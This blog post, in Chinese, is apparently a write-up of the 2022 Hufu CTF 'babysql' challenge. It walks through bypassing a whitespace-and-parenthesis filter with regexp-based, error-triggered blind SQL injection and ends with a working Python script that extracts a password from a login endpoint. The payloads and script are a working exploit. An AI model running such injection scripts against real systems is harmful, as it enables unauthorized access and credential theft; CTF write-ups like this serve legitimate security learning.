<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="2022虎符"><meta name="keywords" content=""><meta name="author" content="vague huang"><meta name="copyright" content="vague huang"><title>2022虎符 | Tlife</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  hexoVersion: '5.2.0'
} </script><meta name="generator" content="Hexo 5.2.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#babysql"><span class="toc-number">1.</span> <span class="toc-text">babysql</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">vague huang</div><div class="author-info__description text-center"></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">255</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">18</span></a></div></div></div><div id="content-outer"><div class="no-bg" id="top-container"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Tlife</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">2022虎符</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2022-03-19</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h2 id="babysql"><a href="#babysql" class="headerlink" title="babysql"></a>babysql</h2><p>比赛的时候一开始没发现过滤了空格，所以一直出不了，后来才发现，所以说，对于不确定的正则表达式还是要去实际测试一下才行，然后一看就是要盲注，由于过滤了括号</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">.replace(&#x2F;[\s,()#;*\-]&#x2F;g, &#39;&#39;)</span><br><span class="line">.replace(&#x2F;^.*(?&#x3D;union|binary).*$&#x2F;gi, &#39;&#39;)</span><br><span class="line">.toString();</span><br></pre></td></tr></table></figure>

<p>所以首选肯定是case，接下来就是构造盲注语句了，由于是要用regexp来构造，读一下文档，发现regexp可以直接作为等号来使用，并且无需空格，可直接比对内容，一开始构造的是,问题在于直接这样是会爆出语法错误的，这个时候’1’和case直接需要有东西隔开，当时思维禁锢住了，没想到使用||。。。。傻逼了</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">or&#39;1&#39;&#x3D;&#39;1&#39;case&#39;1&#39;whenxxxx</span><br></pre></td></tr></table></figure>

<p>构造出来以后可以得到</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&#39;a&#39;||case&#39;1&#39;when&#39;1&#39;then&#39;1&#39;else&#39;0&#39;end||&#39;a&#39;;</span><br></pre></td></tr></table></figure>

<p>，接下来就是使用regexp进行盲注，盲注的结果分为两种，一种是状态401，一种是状态500,500是因为报错才会产生的，所以我们就构造一个报错盲注,由于不能使用函数，所以这里可以通过数值之间的大数运算来引起报错</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&#39;a&#39;||case&#39;1&#39;when&#39;1&#39;then&#39;1&#39;else~0+~0+&#39;a&#39;end||&#39;a&#39;;</span><br></pre></td></tr></table></figure>

<p>接下来就是完善最重要的regexp的盲注部分了</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&#39;||case&#39;1&#39;when&#96;username&#96;regexp&#39;^Db&#39;then&#39;1&#39;else~0+~0+&#39;a&#39;end||&#39;a&#39; limit 1;</span><br></pre></td></tr></table></figure>

<p>但是接下来还需要解决大小写问题，查阅mysql8.0的文档，发现regexp在比对的时候可以设置字符集用来表示规则（也就是可以比对大小写）但是我在本地测试的时候，发现要使用对应数据库的编码形式才可以，看了一下hint，可以发现这个数据库是使用这个编码规则的</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">COLLATE&#x3D;utf8mb4_0900_as_cs</span><br></pre></td></tr></table></figure>

<p>所以我们的payload也呼之欲出了,使用</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&#39;||case&#39;1&#39;when&#96;username&#96;regexp&#39;a&#39;COLLATE‘utf8mb4_0900_as_cs’then&#39;1&#39;else~0+~0+&#39;a&#39;end||&#39;a</span><br></pre></td></tr></table></figure>

<p>接下来就是写成脚本了</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line">url=<span class="string">&quot;http://110.42.133.120:8080/login&quot;</span></span><br><span class="line">s=requests.session()</span><br><span class="line"><span class="comment">#a=string.printable</span></span><br><span class="line">a=<span class="string">&quot;0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!%&amp;&#x27;/:&lt;=&gt;@[]^_`&#123;&#125;~^!$&quot;</span></span><br><span class="line">print(a)</span><br><span class="line">print(a[<span class="number">-3</span>:])</span><br><span class="line">str = <span class="string">&quot;&quot;</span><span class="comment">#aeoo</span></span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">100</span>):</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> a:</span><br><span class="line">        <span class="keyword">if</span> i <span class="keyword">in</span> a[<span class="number">-3</span>:]:</span><br><span class="line">            i=i.replace(i,<span class="string">f&#x27;\\\\<span class="subst">&#123;i&#125;</span>&#x27;</span>)</span><br><span class="line">        payload=<span class="string">f&quot;a&#x27;||case&#x27;1&#x27;when`password`regexp&#x27;^<span class="subst">&#123;str+i&#125;</span>&#x27;COLLATE`utf8mb4_0900_as_cs`then&#x27;1&#x27;else~0+~0+&#x27;a&#x27;end||&#x27;a&quot;</span></span><br><span class="line">        data=&#123;</span><br><span class="line">            <span class="string">&quot;username&quot;</span>:payload,</span><br><span class="line">            <span class="string">&quot;password&quot;</span>:<span class="string">&quot;a&quot;</span></span><br><span class="line">        &#125;</span><br><span class="line">        r=s.post(url,data=data).text</span><br><span class="line">        print(r)</span><br><span class="line">        print(payload)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;401&quot;</span> <span class="keyword">in</span> r:</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;\\&quot;</span> <span class="keyword">in</span> i:</span><br><span class="line">                i.replace(<span class="string">&quot;\\\\&quot;</span>,<span class="string">&quot;&quot;</span>)</span><br><span class="line">            str+=i</span><br><span class="line">            print(<span class="string">f&quot;[+]<span class="subst">&#123;str&#125;</span>&quot;</span>)</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>



</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">vague huang</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://example.com/2022/03/19/虎符/">http://example.com/2022/03/19/虎符/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2022/03/27/2022DASCTF-3/"><i class="fa fa-chevron-left">  </i><span>2022DASCTF_3</span></a></div><div class="next-post pull-right"><a href="/2022/03/18/%E5%8C%BA%E5%9D%97%E9%93%BE%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%90%AD%E5%BB%BA%E5%B0%8F%E8%AE%B0/"><span>区块链服务器搭建小记</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2013 - 2023 By vague huang</div><div class="framework-info"><span>Driven - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/lib/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"log":false});</script></body></html>